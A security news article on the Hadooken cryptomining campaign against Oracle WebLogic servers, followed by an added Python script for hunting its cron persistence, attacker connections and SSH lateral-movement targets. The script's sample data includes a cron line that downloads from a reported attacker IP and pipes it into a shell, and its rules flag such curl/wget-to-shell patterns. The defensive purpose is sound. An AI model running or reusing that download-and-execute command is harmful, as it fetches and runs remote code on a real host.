Cybersecurity researchers have discovered a new malware campaign targeting Linux environments for illegal cryptocurrency mining.
The activity specifically targets Oracle WebLogic servers and is designed to deliver a malware strain dubbed Hadooken, according to cloud security company Aqua.
“Once Hadooken is executed, it drops the Tsunami malware and deploys a cryptocurrency miner,” said security researcher Assaf Morag.
The attack chain exploits known security vulnerabilities and misconfigurations, such as weak credentials, to gain an initial foothold and then execute arbitrary code on susceptible instances.
This is achieved by launching two nearly identical payloads, one written in Python and the other in a shell script, both of which are responsible for retrieving the Hadooken malware from a remote server (either “89.185.85(.)102” or “185.174.136(.)204”).
“Additionally, the shell script version iterates through various directories containing SSH data (user credentials, host information, secrets, etc.) and attempts to use this information to attack known servers,” Morag said.
“They then move laterally within an organization or across connected environments to further spread the Hadooken malware.”
Hadooken incorporates two components: a cryptocurrency miner and a distributed denial of service (DDoS) botnet called Tsunami (also known as Kaiten), which has a history of targeting Jenkins and Weblogic services deployed on Kubernetes clusters.
Additionally, the malware establishes persistence on the host by creating cron jobs that re-run the cryptocurrency miner at various intervals.
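The following is an added example, not Aqua's tooling or code from the campaign, showing how a responder might hunt for the behaviours described above on a suspect host: cron entries that reference the two reported IP addresses or use a download-and-pipe-to-shell pattern, live connections to those addresses, and the set of SSH targets (known_hosts and ssh_config entries) that the shell-script variant could have used for lateral movement. Only the two IP addresses come from the page; all sample cron lines, socket lines, known_hosts and ssh_config content are constructed for the example, and the heuristics (temp-directory executables, curl/wget piped into sh) are generic hunting rules, not indicators Aqua published.

```python
import re
from dataclasses import dataclass

# The two IPs reported on this page, with the defanging brackets removed
# so they match raw log text.
HADOOKEN_IPS = {"89.185.85.102", "185.174.136.204"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
TMP_EXEC_RE = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/")


@dataclass
class Finding:
    source: str
    line: str
    reason: str


def scan_cron_lines(lines, source="crontab"):
    """Flag cron entries matching the persistence pattern described above:
    a reported IP, a download piped into a shell, or a payload in a temp dir."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits = set(IP_RE.findall(line)) & HADOOKEN_IPS
        if hits:
            findings.append(Finding(source, line, f"references reported IP {sorted(hits)}"))
        elif PIPE_TO_SHELL_RE.search(line):
            findings.append(Finding(source, line, "downloads and pipes into a shell"))
        elif TMP_EXEC_RE.search(line):
            findings.append(Finding(source, line, "runs a payload from a temp directory"))
    return findings


def scan_connections(lines, source="ss"):
    """Flag socket lines (e.g. from `ss -tn`) that talk to a reported IP."""
    findings = []
    for raw in lines:
        hits = set(IP_RE.findall(raw)) & HADOOKEN_IPS
        if hits:
            findings.append(Finding(source, raw.strip(), f"connection to reported IP {sorted(hits)}"))
    return findings


def ssh_reachable_hosts(known_hosts_text, ssh_config_text):
    """Enumerate hosts the compromised account's SSH data points at, the same
    data the shell-script variant reads to pick lateral-movement targets.
    Returns (hosts, hashed_count); hashed known_hosts entries (HashKnownHosts)
    cannot be recovered here and are only counted."""
    hosts, hashed = set(), 0
    for raw in known_hosts_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @cert-authority / @revoked marker
            line = line.split(None, 1)[1]
        first = line.split()[0]
        if first.startswith("|1|"):
            hashed += 1
            continue
        for h in first.split(","):
            # "[host]:port" form for non-default ports
            hosts.add(h[1:h.index("]")] if h.startswith("[") else h)
    for raw in ssh_config_text.splitlines():
        m = re.match(r"\s*(Host|HostName)\s+(.+)", raw, re.I)
        if m:
            for h in m.group(2).split():
                if "*" not in h and "?" not in h:  # skip wildcard blocks
                    hosts.add(h)
    return hosts, hashed


# Constructed sample inputs (not real artefacts from the campaign).
CRON_SAMPLE = """
# m h dom mon dow command
0 * * * * /usr/bin/find /var/log -name '*.log' -mtime +30 -delete
*/5 * * * * curl -s http://89.185.85.102/x | sh
@reboot /tmp/.cache/run.sh
""".splitlines()

SS_SAMPLE = [
    "ESTAB 0 0 10.0.0.5:43122 185.174.136.204:443",
    "ESTAB 0 0 10.0.0.5:22 10.0.0.9:51234",
]

KNOWN_HOSTS_SAMPLE = """\
app-01.internal,10.0.0.9 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIexample
|1|c2FsdHNhbHRzYWx0c2FsdHNhbHQ=|aGFzaGhhc2hoYXNoaGFzaGhhc2g= ssh-rsa AAAAB3example
"""

SSH_CONFIG_SAMPLE = """\
Host bastion
    HostName bastion.internal
    User deploy
Host *
    ServerAliveInterval 60
"""

if __name__ == "__main__":
    for f in scan_cron_lines(CRON_SAMPLE) + scan_connections(SS_SAMPLE):
        print(f"[{f.source}] {f.reason}: {f.line}")
    hosts, hashed = ssh_reachable_hosts(KNOWN_HOSTS_SAMPLE, SSH_CONFIG_SAMPLE)
    print("SSH targets to check:", sorted(hosts), "| hashed entries skipped:", hashed)
```

On a real host, feed `crontab -l` for every user plus the files under /etc/cron.d and /var/spool/cron, the output of `ss -tn`, and each user's ~/.ssh/known_hosts and ~/.ssh/config into these functions; any host returned by `ssh_reachable_hosts` should be treated as a candidate for the same checks, since that is exactly the list the malware would have worked through.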
Aqua notes that the IP address 89.185.85(.)102 is registered to German hosting company Aeza International LTD (AS210644), and a previous report from Uptycs in February 2024 linked it to an 8220 Gang cryptocurrency campaign exploiting flaws in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address, 185.174.136(.)204, is currently inactive but is also linked to Aeza Group Ltd. (AS216246). As noted by Qurium and EU DisinfoLab in July 2024, Aeza is a bulletproof hosting service provider based in two data centers, Moscow M9 and Frankfurt.
“Aeza’s modus operandi and rapid growth can be explained by its recruitment of young developers who have ties to a bulletproof Russian hosting provider that provides a haven for cybercrime,” the researchers said in the report.